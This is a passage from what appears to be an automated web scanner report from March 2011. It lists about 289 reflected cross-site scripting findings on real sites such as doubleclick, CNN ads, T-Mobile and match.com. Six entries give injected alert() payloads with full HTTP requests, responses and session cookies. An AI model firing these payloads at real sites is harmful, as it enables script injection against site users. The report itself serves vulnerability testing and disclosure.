
1.237. http://www.theroot.com/views/where-have-all-sports-heroes-gone [GT1 parameter]

1.238. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 1]

1.239. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 2]

1.240. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 2]

1.241. http://www.theroot.com/views/where-have-all-sports-heroes-gone [name of an arbitrarily supplied request parameter]

1.242. http://www.vxsecurityresearch.org/ [name of an arbitrarily supplied request parameter]

1.243. http://www.vxsecurityresearch.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.244. http://www.zdnet.com/blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042 [REST URL parameter 4]

1.245. http://yahoo.match.com/qsearch/qsearchdl.aspx [name of an arbitrarily supplied request parameter]

1.246. http://yahoo.match.com/search/searchSubmit.aspx [name of an arbitrarily supplied request parameter]

1.247. http://yahoo.match.com/search/searchSubmit.aspx [pn parameter]

1.248. http://yahoo.match.com/search/searchSubmit.aspx [pn parameter]

1.249. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.250. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

1.251. http://melges32.com/ [User-Agent HTTP header]

1.252. http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx [User-Agent HTTP header]

1.253. http://www.t-mobile.com/shop/addons/Accessories/Default.aspx [User-Agent HTTP header]

1.254. http://www.t-mobile.com/shop/addons/Services/information.aspx [User-Agent HTTP header]

1.255. http://www.t-mobile.com/shop/phones/ [User-Agent HTTP header]

1.256. http://www.t-mobile.com/shop/phones/Default.aspx [User-Agent HTTP header]

1.257. http://www.t-mobile.com/shop/plans/Cell-Phone-Plans.aspx [User-Agent HTTP header]

1.258. http://www.zdnet.com/blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042 [Referer HTTP header]

1.259. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 [NGUserID cookie]

1.260. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197303&page.allowcompete=yes&domId=626108 [NGUserID cookie]

1.261. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=211644 [NGUserID cookie]

1.262. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 [NGUserID cookie]

1.263. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 [NGUserID cookie]

1.264. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810 [NGUserID cookie]

1.265. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=428665 [NGUserID cookie]

1.266. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=22098 [NGUserID cookie]

1.267. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=187198 [NGUserID cookie]

1.268. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_interstitial&cnn_money_rollup=markets_and_stocks&params.styles=fs_interstitial&tile=1300909197303&page.allowcompete=yes&domId=289154 [NGUserID cookie]

1.269. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=686077&page.allowcompete=yes&domId=686077 [NGUserID cookie]

1.270. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976 [NGUserID cookie]

1.271. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=417888 [NGUserID cookie]

1.272. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=25457 [NGUserID cookie]

1.273. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129 [NGUserID cookie]

1.274. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=906497 [NGUserID cookie]

1.275. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=217296 [NGUserID cookie]

1.276. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=757816 [NGUserID cookie]

1.277. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes&params.styles=html_tags%20marginheight= [NGUserID cookie]

1.278. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes&params.styles=html_tags+marginheight= [NGUserID cookie]

1.279. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 [NGUserID cookie]

1.280. http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost [meld_sess cookie]

1.281. http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost [meld_sess cookie]

1.282. http://tag.admeld.com/ad/iframe/221/tmz/300x250/ros_inpage [meld_sess cookie]

1.283. http://tag.admeld.com/ad/iframe/221/tmz/300x250/ros_inpage [meld_sess cookie]

1.284. http://tag.admeld.com/ad/iframe/221/tmz/300x250/tremor-300x250 [meld_sess cookie]

1.285. http://tag.admeld.com/ad/iframe/221/tmz/300x250/tremor-300x250 [meld_sess cookie]

1.286. http://tag.admeld.com/ad/iframe/221/tmz/728x90/tremor-728x90 [meld_sess cookie]

1.287. http://tag.admeld.com/ad/iframe/221/tmz/728x90/tremor-728x90 [meld_sess cookie]

1.288. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

1.289. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]



1. Cross-site scripting (reflected)
There are 289 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba557"-alert(1)-"eed0cbd30d3 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=ba557"-alert(1)-"eed0cbd30d3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4918
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 22 Mar 2011 22:04:50 GMT
Expires: Tue, 22 Mar 2011 22:04:50 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
NvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=ba557"-alert(1)-"eed0cbd30d3http://www.dishnetwork.com/redirects/promotion/offer22/default.aspx?utm_source=google&utm_medium=display&utm_campaign=testbooyah");
var wmode = "opaque";
var bg = "ffffff";
var dcallowscriptaccess = "n
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f071f"-alert(1)-"586c30ab82d was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAAf071f"-alert(1)-"586c30ab82d&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:13 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAAf071f"-alert(1)-"586c30ab82d&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80627"-alert(1)-"c043f3127fe was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-783211283734559080627"-alert(1)-"c043f3127fe&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:48 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:04:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
udG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-783211283734559080627"-alert(1)-"c043f3127fe&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah");
var wmode = "opaque";
var bg = "ffffff";
var
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46e2d"-alert(1)-"e00ed999199 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=146e2d"-alert(1)-"e00ed999199&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:28 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:04:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
NrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=146e2d"-alert(1)-"e00ed999199&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm
...[SNIP]...

1.5. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2756b"-alert(1)-"b6a0b2aa765 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg2756b"-alert(1)-"b6a0b2aa765&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:38 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:04:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg2756b"-alert(1)-"b6a0b2aa765&client=ca-pub-7832112837345590&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah");
var wmode = "
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48c1c"-alert(1)-"6255ab16084 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l48c1c"-alert(1)-"6255ab16084&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
